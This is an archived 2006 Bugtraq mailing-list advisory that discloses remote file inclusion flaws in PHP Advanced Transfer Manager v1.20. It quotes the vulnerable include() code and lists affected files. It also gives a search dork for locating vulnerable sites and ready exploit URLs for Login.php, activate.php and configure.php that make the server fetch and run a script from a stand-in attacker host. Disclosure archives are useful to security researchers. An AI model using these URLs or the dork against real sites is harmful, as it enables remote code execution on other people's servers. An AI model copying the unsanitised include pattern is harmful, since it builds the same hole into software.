[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20060910171900.31958.qmail@securityfocus.com>
Date: 10 Sep 2006 17:19:00 -0000
From: l0x3@...mail.com
To: bugtraq@...urityfocus.com
Subject: PHP Advanced Transfer Manager v1.20 ; Multiple Remote File
Include Vulnerabilities
+--------------------------------------------------------------------
+
+ PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities
+
+-------------------------------------------------------------------
+
+ Affected Software .: Software
+ Version .............: PHP Advanced Transfer Manager v1.20
+ Venedor ...........: http://phpatm.free.fr/
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Ex3cut1on)
+ Discovered by ..........: Eddy_BAck0o
+ Contact ...........: l0x3[at]hotmail.com ; www.LEzr.com/vB
+
+--------------------------------------------------------------------
+
+ This weakness in the security of a long Time ;
+ but I had not deployed before ;
+ and many of the sites included This weakness version ...
+ you can be sure for that by dork it
+ intext:\"Powered by PHP Advanced Transfer Manager v1.20"
+ Ex --> victom.com/[local]/anyfile:=)?include_location=http://www.yourev1l.com/r0x.txt?cmd
+
+--------------------------------------------------------------------
+ ./index Directory ...
~ [Login.php]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ include($include_location.'include/conf.php');
+ include($include_location.'include/common.'.$phpExt);
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ Line --> 26 - 625
+ Ex --> http://www.victom.com/[path]/Login.php?include_location=http://www.yourev1l.com/r0x.txt?cmd
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ [activate.php]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ include($include_location.'include/conf.php');
+ include($include_location.'include/common.'.$phpExt);
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ Line --> 26 - 121
+ Ex --> http://www.victom.com/[path]/activate.php?include_location=http://www.yourev1l.com/r0x.txt?cmd
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ [configure.php]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ include($include_location.'include/conf.php');
+ include($include_location.'include/common.'.$phpExt);
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ Line --> 26 - 165
+ Ex --> http://www.victom.com/[path]/configure.php?include_location=http://www.yourev1l.com/r0x.txt?cmd
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ confirm.php < -------- 26 - 122
~ fileop.php < -------- 26 - 145
~ getimg.php < -------- 26 - 56
~ ipblocked.php < -------- 25 - 71
~ register.php < -------- 26 - 291
~ showrecent.php < -------- 26 - 275
~ showtophits.php < -------- 26 - 237
~ usrmanag.php < -------- 26 - 381
~ viewer_bottom.php < -------- 27 - 50
~ viewer_content.php < -------- 27 - 49
~ viewer_top.php < -------- 27 - 57
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ gr33tz 4ll ;LEzr.com/vB [ MoHaJaLi ] :P My best;
+ and all My the Team ;....
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Powered by blists - more mailing lists